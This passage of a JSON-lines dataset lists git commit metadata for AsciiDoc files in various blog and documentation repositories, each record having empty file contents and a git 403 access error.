403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25409635c6df5b7f30c3305c6db0c0ad81ec30dc","subject":"Update 2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","message":"Update 2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","new_file":"_posts\/2015-02-18-Freie-HTML-E-Mail-Layouts-fur-responsive-gerateunabhangige-Newsletter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77540ffcc5898d196691ed58ccfa7e954ad677f","subject":"Update 2016-11-27-Bash-Appetizer.adoc","message":"Update 2016-11-27-Bash-Appetizer.adoc","repos":"akr-optimus\/akr-optimus.github.io,akr-optimus\/akr-optimus.github.io,akr-optimus\/akr-optimus.github.io,akr-optimus\/akr-optimus.github.io","old_file":"_posts\/2016-11-27-Bash-Appetizer.adoc","new_file":"_posts\/2016-11-27-Bash-Appetizer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akr-optimus\/akr-optimus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0402af0c7e30bc79cd1296efa3eeef2a73dc1537","subject":"Create plugin_management.adoc","message":"Create plugin_management.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plugin_management.adoc","new_file":"userguide\/tutorials\/plugin_management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83e1806a568248540d12dd2c2e1a035416a8bb35","subject":"Update 2017-09-14-Otomatik-Odeme.adoc","message":"Update 
2017-09-14-Otomatik-Odeme.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-09-14-Otomatik-Odeme.adoc","new_file":"_posts\/2017-09-14-Otomatik-Odeme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb7e4181a32c0cdc79b4f5fab940ab4e3f8582d9","subject":"Update 2015-04-24-iOS-interview-part-3.adoc","message":"Update 2015-04-24-iOS-interview-part-3.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-24-iOS-interview-part-3.adoc","new_file":"_posts\/2015-04-24-iOS-interview-part-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a841f8acbb98310ac08e64531e8c21b8f8db20c","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d623842454a356a2aacb6021b6ef9b441fa8cb66","subject":"y2b create post $30,000 Headphones!?! -- Sennheiser Orpheus and HD800 (CES 2013)","message":"y2b create post $30,000 Headphones!?! 
-- Sennheiser Orpheus and HD800 (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-17-30000-Headphones--Sennheiser-Orpheus-and-HD800-CES-2013.adoc","new_file":"_posts\/2013-01-17-30000-Headphones--Sennheiser-Orpheus-and-HD800-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34aeacec262396cbc11c0dbd72a14c2fff934970","subject":"Update 2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","message":"Update 2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","new_file":"_posts\/2016-03-02-Epcot-International-Flower-and-Garden-Festival-blooms-today.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5687d3fb67d6c627ab8a2e2561246f55c55446a4","subject":"Added apoc.create.setProperty procedures to the docs","message":"Added apoc.create.setProperty procedures to the docs\n","repos":"larusba\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"docs\/overview.adoc","new_file":"docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98b1fcdeb7f923ade95546491ec2b21486bc90ed","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"694d908f4e06a59ca5d0cdf1e0c303c83a7f1fe3","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5319551d5b746cc7bdbe63889901600590fcd387","subject":"Update 2017-10-01-1st-post.adoc","message":"Update 
2017-10-01-1st-post.adoc","repos":"ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io","old_file":"_posts\/2017-10-01-1st-post.adoc","new_file":"_posts\/2017-10-01-1st-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ecmeyva\/ecmeyva.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0dc21365de6794d4a02a9e91213e7e7137c304f","subject":"initial description of suggested plans mechanism (#796)","message":"initial description of suggested plans mechanism (#796)\n\n* initial design for suggested plans mechanism\r\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/plans.adoc","new_file":"documentation\/design_docs\/design\/plans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4f8bc391d3d69d6ef28d82da919601eea419c7b","subject":"Update 2015-06-15-API-Management-on-Kubernetes.adoc","message":"Update 2015-06-15-API-Management-on-Kubernetes.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-06-15-API-Management-on-Kubernetes.adoc","new_file":"_posts\/2015-06-15-API-Management-on-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d86da64c0deabdb8eb2caee7f0cbbc74ef749ef2","subject":"Update 2015-10-23-STB-BTMICE-Site-Revamp-Video.adoc","message":"Update 2015-10-23-STB-BTMICE-Site-Revamp-Video.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-10-23-STB-BTMICE-Site-Revamp-Video.adoc","new_file":"_posts\/2015-10-23-STB-BTMICE-Site-Revamp-Video.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ba314c733fe5f2a175e2b8e8d871d61e3e3202","subject":"[Docs] Changes to ingest.asciidoc (#28212)","message":"[Docs] Changes to ingest.asciidoc 
(#28212)\n\n","repos":"rajanm\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/ingest.asciidoc","new_file":"docs\/reference\/ingest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6628ac9fb786bba138d9a42109aeb75ab656152","subject":"Test workaround awesome bug","message":"Test workaround awesome bug\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12fa5170e0402b73039d067baf63001aea542912","subject":"1.3.5.Final blog post","message":"1.3.5.Final blog post\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-04-28-release-1.3.5.adoc","new_file":"_blog-src\/_posts\/2018-04-28-release-1.3.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cbc956609530f4b1c81ed57e0515041a88708e28","subject":"y2b create post Booq Boa Sleeve Winners!","message":"y2b create post Booq Boa Sleeve 
Winners!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-21-Booq-Boa-Sleeve-Winners.adoc","new_file":"_posts\/2011-04-21-Booq-Boa-Sleeve-Winners.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be6bc03c0ebd9e6ae744318e65ec70d37cc78d3b","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4282969cd35d22d6d4ef9bb4ad1f62b28ef88327","subject":"Update 2017-02-17-Building-a-Linux-Devbox.adoc","message":"Update 2017-02-17-Building-a-Linux-Devbox.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-02-17-Building-a-Linux-Devbox.adoc","new_file":"_posts\/2017-02-17-Building-a-Linux-Devbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a019aed39127109f2acfae11b0384416552721a3","subject":"y2b create post WTF is a WiFi Hard Drive? (Corsair Voyager Air Review)","message":"y2b create post WTF is a WiFi Hard Drive? 
(Corsair Voyager Air Review)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-23-WTF-is-a-WiFi-Hard-Drive-Corsair-Voyager-Air-Review.adoc","new_file":"_posts\/2013-07-23-WTF-is-a-WiFi-Hard-Drive-Corsair-Voyager-Air-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c11a638e38dfad356d0f5b8baece8955e7f14a3","subject":"Added clarification about RestcommONE as a commercial service and CTA","message":"Added clarification about RestcommONE as a commercial service and CTA\n","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c58e926d6fa95f85c2868ee5bfacdb3c3de449e8","subject":"add Manpage build status icon","message":"add Manpage build status icon","repos":"araisrobo\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0247507ce7ac7679b4560629678c5da8bc488b99","subject":"Update 2015-10-17-Securing-communication-using-OTR-and-PGP-plugin-for-Thunderbird.adoc","message":"Update 2015-10-17-Securing-communication-using-OTR-and-PGP-plugin-for-Thunderbird.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Securing-communication-using-OTR-and-PGP-plugin-for-Thunderbird.adoc","new_file":"_posts\/2015-10-17-Securing-communication-using-OTR-and-PGP-plugin-for-Thunderbird.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eeaddcd42bfa18f677d1318835b75c5f70792cf2","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 
2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f19c3a3e73a3908a199b718531d20effea7dec2a","subject":"Update 2016-01-25-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","message":"Update 2016-01-25-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-25-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","new_file":"_posts\/2016-01-25-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509123933b30ee871dbbab04a91a2b860a0c9a62","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1da8854eb80b0dd104467baa4a2a1b8f83b214b","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c7173dd4dc70c5a2595a8ce63f3b11726222e13","subject":"More automation","message":"More automation\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e70c817d9a85d85bb72104376bdd38517f37f6c","subject":"XSLWeb version from 4.0.1 to 4.1.0, added documentation for Pac4J dependency, several changes to documentation about security.","message":"XSLWeb version from 4.0.1 to 4.1.0, added documentation for Pac4J dependency, several changes to documentation about 
security.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62c4abd14c4bfea709eeb5bc943af127d69b552e","subject":"Added an import statement.","message":"Added an import statement.\n","repos":"lchennup\/elasticsearch,areek\/elasticsearch,tkssharma\/elasticsearch,iacdingping\/elasticsearch,Shepard1212\/elasticsearch,wangtuo\/elasticsearch,Fsero\/elasticsearch,artnowo\/elasticsearch,uschindler\/elasticsearch,weipinghe\/elasticsearch,dataduke\/elasticsearch,hanswang\/elasticsearch,LeoYao\/elasticsearch,xpandan\/elasticsearch,nknize\/elasticsearch,yynil\/elasticsearch,vietlq\/elasticsearch,nrkkalyan\/elasticsearch,overcome\/elasticsearch,jchampion\/elasticsearch,markharwood\/elasticsearch,kalburgimanjunath\/elasticsearch,strapdata\/elassandra-test,liweinan0423\/elasticsearch,cwurm\/elasticsearch,iamjakob\/elasticsearch,zhiqinghuang\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,camilojd\/elasticsearch,petabytedata\/elasticsearch,lmtwga\/elasticsearch,pranavraman\/elasticsearch,yongminxia\/elasticsearch,brandonkearby\/elasticsearch,pranavraman\/elasticsearch,lks21c\/elasticsearch,MetSystem\/elasticsearch,davidvgalbraith\/elasticsearch,abibell\/elasticsearch,kenshin233\/elasticsearch,mbrukman\/elasticsearch,ricardocerq\/elasticsearch,Collaborne\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,MjAbuz\/elasticsearch,mnylen\/elasticsearch,yongminxia\/elasticsearch,Siddartha07\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra-test,sc0ttkclark\/elasticsearch,IanvsPoplicola\/elasticsearch,lchennup\/elasticsearch,hirdesh2008\/elasticsearch,beiske\/elasticsearch,pablocastro\/elasticsearch,mohit\/elasticsearch,wittyameta\/elasticsearch,beiske\/elasticsearch,IanvsPoplicola\/elasticsearch,liweinan0423\/elasticsearch,amit-shar\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,Charlesdong\/elasticsearch,C-Bish\/elasticsearch,episerver\/elasticsearch,wittyameta\/elasticsearch,socialrank\/elasticsearch,pranavraman\/elasticsearch,nomoa\/elasticsearch,jimhooker2002\/elasticsearch,trangvh\/elasticsearch,mmaracic\/elasticsearch,elasticdog\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,queirozfcom\/elasticsearch,schonfeld\/elasticsearch,pritishppai\/elasticsearch,snikch\/elasticsearch,bestwpw\/elasticsearch,ydsakyclguozi\/elasticsearch,mnylen\/elasticsearch,SergVro\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,cwurm\/elasticsearch,tkssharma\/elasticsearch,kcompher\/elasticsearch,zeroctu\/elasticsearch,ImpressTV\/elasticsearch,lchennup\/elasticsearch,Kakakakakku\/elasticsearch,lzo\/elasticsearch-1,pozhidaevak\/elasticsearch,hafkensite\/elasticsearch,liweinan0423\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,fekaputra\/elasticsearch,episerver\/elasticsearch,linglaiyao1314\/elasticsearch,beiske\/elasticsearch,Collaborne\/elasticsearch,nellicus\/elasticsearch,wimvds\/elasticsearch,sdauletau\/elasticsearch,artnowo\/elasticsearch,xuzha\/elasticsearch,tebriel\/elasticsearch,EasonYi\/elasticsearch,nilabhsagar\/elasticsearch,szroland\/elasticsearch,queirozfcom\/elasticsearch,djschny\/elasticsearch,ricardo
cerq\/elasticsearch,xuzha\/elasticsearch,knight1128\/elasticsearch,adrianbk\/elasticsearch,lydonchandra\/elasticsearch,onegambler\/elasticsearch,iamjakob\/elasticsearch,zhiqinghuang\/elasticsearch,mortonsykes\/elasticsearch,kubum\/elasticsearch,jbertouch\/elasticsearch,kenshin233\/elasticsearch,kingaj\/elasticsearch,drewr\/elasticsearch,yongminxia\/elasticsearch,MichaelLiZhou\/elasticsearch,sarwarbhuiyan\/elasticsearch,LewayneNaidoo\/elasticsearch,elancom\/elasticsearch,mcku\/elasticsearch,18098924759\/elasticsearch,lzo\/elasticsearch-1,Shekharrajak\/elasticsearch,jsgao0\/elasticsearch,nrkkalyan\/elasticsearch,petabytedata\/elasticsearch,Liziyao\/elasticsearch,18098924759\/elasticsearch,luiseduardohdbackup\/elasticsearch,JervyShi\/elasticsearch,ydsakyclguozi\/elasticsearch,acchen97\/elasticsearch,zeroctu\/elasticsearch,socialrank\/elasticsearch,fekaputra\/elasticsearch,yanjunh\/elasticsearch,dylan8902\/elasticsearch,jprante\/elasticsearch,tkssharma\/elasticsearch,sposam\/elasticsearch,kaneshin\/elasticsearch,polyfractal\/elasticsearch,Chhunlong\/elasticsearch,sarwarbhuiyan\/elasticsearch,MaineC\/elasticsearch,F0lha\/elasticsearch,scottsom\/elasticsearch,mute\/elasticsearch,C-Bish\/elasticsearch,andrestc\/elasticsearch,yuy168\/elasticsearch,s1monw\/elasticsearch,Ansh90\/elasticsearch,strapdata\/elassandra-test,dongjoon-hyun\/elasticsearch,nilabhsagar\/elasticsearch,lightslife\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,diendt\/elasticsearch,hafkensite\/elasticsearch,slavau\/elasticsearch,hanswang\/elasticsearch,HonzaKral\/elasticsearch,ricardocerq\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra5-rc,Shekharrajak\/elasticsearch,scottsom\/elasticsearch,likaiwalkman\/elasticsearch,lightslife\/elasticsearch,AndreKR\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,tebriel\/elasticsearch,tsohil\/elasticsearch,EasonYi\/elasticsearch,zkidkid\/elasticsearch,likaiwalkman\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,HarishAtGitHub\/elasticsearch,likaiwalkman\/elasticsearch,pablocastro\/elasticsearch,dylan8902\/elasticsearch,wenpos\/elasticsearch,JackyMai\/elasticsearch,nomoa\/elasticsearch,MaineC\/elasticsearch,jsgao0\/elasticsearch,Ansh90\/elasticsearch,amit-shar\/elasticsearch,iamjakob\/elasticsearch,luiseduardohdbackup\/elasticsearch,elancom\/elasticsearch,sarwarbhuiyan\/elasticsearch,djschny\/elasticsearch,lydonchandra\/elasticsearch,geidies\/elasticsearch,MetSystem\/elasticsearch,Chhunlong\/elasticsearch,tkssharma\/elasticsearc